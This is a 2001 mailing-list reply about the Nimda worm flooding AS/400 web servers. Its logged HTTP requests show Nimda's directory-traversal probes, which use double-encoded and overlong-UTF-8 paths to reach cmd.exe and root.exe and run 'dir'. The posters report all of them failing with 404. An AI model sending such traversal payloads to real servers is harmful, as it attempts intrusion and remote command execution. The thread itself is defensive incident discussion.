RE: NIMDA Virus - Anyone been affected by it ? -- MIDRANGE-L

Ditto, increased our traffic by 300%.  Mind you it didn't phase our machine
or appear to have any effect on our users, but I couldn't figure out how to
prevent it.  Thank goodness for the good old HTTP Server.

For those who aren't sure what we are referring to, here is a snippet from
the HTTP log file.  We were all sitting around the office laughing at these
stupid Windows requests on a 400...

"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 232
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 232
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 232
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 232
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232

This went on for over a week from literally hundreds of IP addresses.  Our
ISP had no idea what to do, so we just let it run it's course.  You'll
notice, of course, that the response code on each one of these is 404, so
they never hurt anything.

Joel R. Cochran
Director of Internet Services
VamaNet.com
800-480-8810 (va toll free)
540-885-8050 (phone)
540-886-1589 (fax)
www.vamanet.com
mailto:custservice@vamanet.com


>-----Original Message-----
>From: Larryt222@aol.com [mailto:Larryt222@aol.com]
>Sent: Thursday, October 04, 2001 3:09 PM
>To: midrange-l@midrange.com
>Subject: Re: NIMDA Virus - Anyone been affected by it ?
>
>
>Why NIMDA did nothing to our 400, the site was hit an average
>of 8,000 times a day which caused our stores to get slower
>response because of all the trafic on the line.  NIMDA was
>trying to execute NT code which as you know does not execute
>on the 400. It appears that once they have an IP address NIMDA
>keeps on trying to contact that IP.
>
>Larry T.
>_______________________________________________
>This is the Midrange Systems Technical Discussion (MIDRANGE-L)
>mailing list
>To post a message email: MIDRANGE-L@midrange.com
>To subscribe, unsubscribe, or change list options,
>visit: http://lists.midrange.com/cgi-bin/listinfo/midrange-l
>or email: MIDRANGE-L-request@midrange.com
>Before posting, please take a moment to review the archives
>at http://archive.midrange.com/midrange-l.
>